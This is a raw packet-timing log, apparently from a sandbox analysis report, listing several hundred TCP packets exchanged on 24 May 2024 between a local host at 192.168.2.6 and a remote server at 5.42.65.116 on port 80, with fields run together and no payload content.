                                May 24, 2024 00:22:02.599488974 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.599488974 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.600254059 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.600266933 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.601151943 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.601165056 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.601198912 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.601198912 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.602083921 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.602097034 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.602108002 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.602138996 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.602138996 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.602503061 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.602972031 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.602987051 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.603039026 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.603039026 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.603848934 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.603862047 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.603872061 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.603924036 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.603924036 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.665080070 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.665093899 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.665146112 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.665146112 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.665497065 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.665822029 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.665976048 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.665987968 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.665997982 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.666019917 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.666080952 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.666904926 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.666969061 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.667368889 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.667521000 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.667860985 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.667875051 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.667916059 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.668764114 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.668776035 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.668827057 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.668828011 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.669522047 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.669533968 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.669874907 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.673259974 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.673271894 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.673281908 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.673293114 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.673305988 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.673317909 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.673330069 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.673338890 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.673338890 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.673341036 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.673355103 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.673659086 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.673665047 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.673676968 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.673744917 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.673744917 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.674382925 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.674395084 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.674506903 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.675082922 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.675096035 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.675106049 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.675148964 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.675148964 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.675993919 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.676006079 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.676039934 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.676067114 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.677062988 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.677076101 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.677129030 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.677129030 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.677886963 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.677900076 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.678119898 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.678770065 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.678782940 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.678921938 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.679721117 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.679733038 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.679744005 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.679792881 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.679792881 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.680701017 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.680711985 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.681243896 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.681539059 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.681550026 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.681590080 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.681605101 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.682450056 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.682460070 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.682507992 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.683374882 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.683386087 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.683393955 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.683438063 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.683438063 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.684324026 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.684334993 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.684381962 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.684381962 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.685236931 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.685249090 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.685307980 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.685307980 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.686105013 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.686115980 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.686163902 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.686163902 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.686969042 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.686981916 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.687123060 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.687879086 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.687891960 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.687900066 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.687942028 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.687942028 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.688755035 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.688766003 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.688860893 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.689647913 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.689660072 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.689699888 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.689699888 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.690541983 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.690553904 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.690623999 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.691384077 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.691396952 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.691406012 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.691430092 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.691459894 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.692244053 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.692255974 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.692306995 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.692306995 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.693120956 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.693134069 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.693180084 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.693180084 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.693945885 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.693958998 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.694001913 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.694782972 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.694797039 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.695081949 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.695641041 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.695653915 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.695663929 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.695686102 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.695710897 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.695710897 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.696511984 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.696525097 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.696693897 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.697355986 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.697370052 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.697419882 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.697419882 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.698188066 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.698200941 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.698431969 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.699068069 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.699081898 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.699091911 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.699137926 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.699137926 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.699891090 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.699903965 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.699958086 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.699959040 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.700793982 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.700807095 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.700876951 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.701612949 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.701626062 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.701680899 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.701680899 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.702707052 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.702718973 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.702761889 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.703293085 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.703306913 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.703318119 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.703341961 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.703371048 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.704166889 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.704179049 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.704221964 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.704221964 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.705007076 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.705018997 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.705174923 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.705862045 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.705873966 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.705883980 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.705934048 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.705934048 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.750442982 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.750627041 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.765194893 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.765408039 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.765413046 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.765701056 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.765825033 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.766141891 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.766272068 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.766285896 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.766295910 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.766329050 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.766352892 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.767074108 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.767517090 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.767520905 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.767735004 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.767941952 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.767955065 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.767963886 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.767980099 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.767999887 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.768027067 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.768027067 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.768800020 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.768811941 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.768861055 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.768861055 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.769655943 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.769666910 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.769676924 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.769728899 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.769728899 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.770533085 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.770545006 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.770586014 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.771341085 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.771352053 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.771476030 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.772198915 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.772211075 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.772221088 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.772268057 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.772268057 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.773097992 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.773109913 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.773164034 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.773164034 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.773930073 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.773941994 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.774209023 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.774585009 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.774596930 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.774606943 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.774648905 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.774648905 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.775268078 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.775279999 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.775546074 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.775957108 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.775970936 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.776036978 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.776590109 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.776601076 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.776650906 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.777287006 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.777299881 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.777344942 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.777344942 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.778003931 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.778016090 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.778023958 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.778075933 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.778075933 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.778676987 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.778687000 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.778918028 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.779351950 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.779364109 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.779414892 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.779414892 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.780005932 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.780018091 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.780536890 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.780708075 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.780719995 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.780728102 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.780782938 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.780798912 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.781416893 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.781430006 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.781608105 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.782074928 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.782085896 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.782128096 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.782128096 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.782715082 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.782726049 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.782735109 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.782780886 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.782782078 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.783683062 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.783695936 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.783704042 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.783723116 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.783740997 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.783767939 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.783767939 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.784638882 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.784651041 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.784658909 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.784708023 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.784708023 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.785598040 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.785609961 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.785619020 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.785672903 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.785672903 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.786509991 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.786520004 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.786530018 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.786535978 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.786576033 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.786576033 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.787472010 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.787483931 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.787502050 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.787524939 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.787542105 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.788367033 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.788378000 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.788388968 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.788431883 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.788431883 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.789237976 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.789249897 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.789259911 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.789264917 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.789288998 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.789892912 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.790108919 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.790121078 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.790131092 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.790164948 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.790182114 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.790977955 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.790988922 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.790997982 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.791034937 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.791122913 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.791807890 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.791820049 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.791830063 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.791841030 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.791862965 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.791891098 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.792638063 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.792649984 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.792654991 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.792721033 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.793431044 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.793442011 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.793454885 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.793476105 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.793493986 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.794203043 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.794214964 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.794224024 CEST80497145.42.65.116192.168.2.6
